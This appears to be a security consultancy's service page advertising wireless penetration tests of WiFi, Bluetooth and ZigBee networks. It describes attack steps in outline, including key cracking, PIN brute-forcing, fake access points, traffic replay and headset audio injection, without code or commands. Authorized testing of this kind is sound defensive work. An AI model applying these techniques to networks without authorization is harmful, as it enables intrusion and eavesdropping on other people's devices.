Wireless Networks

Use Our Offense to Inform Your Defense

Wireless network security assessments help an organization gain a clear understanding of the risks facing their information assets from an outsider's perspective – a measure of the publicly-accessible exposure that may be probed and attacked by passerby, proximate targeted attackers, or contractors and visitors. Common wireless network environments include WiFi connectivity for guests and internal users, Bluetooth personal area network (PAN) environments, and purpose-built 802.15.4 / ZigBee networks.

Whether a high-level overview or a thorough, in-depth review is desired, DISD works with your staff to produce prioritized findings, recommendations, and remediation or mitigation steps to fit your organization's profile.

DISD performs wireless network security assessments according to well-developed and refined methodologies, in order to provide thorough, accurate, and reproducible results. WiFi security testing typically begins with identification of accessible 802.11 networks, confirmation of target SSIDs, and identification of any rogue access points. Consultants determine the target network's BSSID, band, frequency, encryption, and authentication settings. DISD captures encrypted communications and client authentication traffic to aid in password guessing attacks, and utilizes automated software and high-power GPU clusters to efficiently attempt encryption key cracking. When successful, consultants decrypt captured traffic, gain access to the wireless network, and test segregation controls to the internal network.

Activities involved in a WiFi network penetration test include, but are not limited to:

  • Site survey for 802.11a/b/g/n wireless networks
  • Identification of network transmission characteristics
  • Identification of network encryption and authentication mechanisms
  • Traffic capture and decryption
  • Encryption key discovery
  • Customized wordlist generation
  • Pre-shared key guessing attacks
  • Rogue AP detection
  • Fake AP attacks against clients


Bluetooth security tests begin with spectrum analysis techniques to passively discover traffic indicative of Bluetooth transmissions. Active discovery techniques are used to locate devices in "discoverable mode", then enumerate these devices' addresses, names, and services. For "non-discoverable" devices, passive sniffing combined with brute-force techniques reveals device addresses. With knowledge of the device address, consultants connect to target devices to further enumerate details such as device class, features, Bluetooth specification, and protocol stacks implemented. Enumeration also reveals security protections such as encryption, authentication, and authorization. Traditional authentication pairing traffic is captured and subjected to offline brute-force attacks to identify the PIN value, and corresponding link key. This key value is used to connect to the target device (bypassing address-based authorization checks if necessary), and potentially decrypt captured network traffic. Susceptibility to denial-of-service and service degradation attacks can be measured. Further, input validation and fuzzing activities can be undertaken to test protocol and application robustness and fault tolerance. Depending on the target device profile, unauthorized access may be leveraged, for example, to inject or record audio to and from a headset device (HSP), download sensitive files (OPP/OBEX, FTP), or for other relevant actions.

Activities involved in a Bluetooth security assessment include, but are not limited to:

  • Site survey for FHSS Bluetooth transmissions, devices, and piconets
  • Identification of target device addresses, names, and services
  • Connections to target devices to enumerate additional information, including device class
  • Identification of security protections and requirements
  • Identification of network transmission characteristics
  • Unauthenticated access attempts
  • Authentication traffic capture and offline PIN cracking attempts
  • Online PIN guessing attacks
  • Authorization bypass attempts
  • Authenticated access service use and abuse
  • Encryption key discovery and traffic decryption
  • Rogue device detection
  • Fake device attacks against clients
  • (optional) Denial and degradation of service tests
  • Input validation tests
  • Protocol- and application-level fuzzing
  • Audio recording and injection attempts


802.15.4 (including ZigBee-based) security tests begin with active discovery attempts to identify router and coordinator device addresses, PAN IDs, channels, and stack versions. Passive sniffing additionally locates end devices once an active channel has been identified. Enumeration of security protections around confidentiality and integrity, as well as discovery of application layer profiles follow. Traffic is captured and analyzed to verify the existence or lack of encryption. Where over-the-air key provisioning is utilized, plaintext keys are extracted. Attempts are made to replay captured traffic into the network. Provided physical access to a ZigBee device, consultants attempt to extract and analyze memory space, and search for stored encryption keys. With knowledge of the encryption key, consultants decrypt captured traffic, and modify selected packets for replay attempts. This key is also used to directly access the network in order to interact with and manipulate routers, coordinators, and end devices. Susceptibility to denial-of-service and service degradation attacks can also be measured, and fuzzing activities can be undertaken to test application robustness and fault tolerance.

Activities involved in a ZigBee security assessment include, but are not limited to:

  • Site survey for ZigBee transmissions, devices, and PANs
  • Identification of target device addresses, PAN IDs, stack profiles, and versions
  • (optional) Physical triangulation of target devices, to gain access to hardware
  • Memory extraction and analysis
  • Identification of security protections and requirements
  • Identification of network transmission characteristics
  • Application profiling
  • 'ACL mode' authorization bypass attempts
  • Unauthenticated access attempts
  • Traffic replay attempts
  • Authentication traffic capture and key extraction attempts
  • Encryption key discovery and traffic decryption
  • Fake device attacks against clients
  • (optional) Denial and degradation of service tests
  • Application-level fuzzing

DISD works with our customers to identify the goals of security assessments prior to testing, and is available to assist in remediation efforts upon request.

Contact Us to Learn More, or Receive A Quote.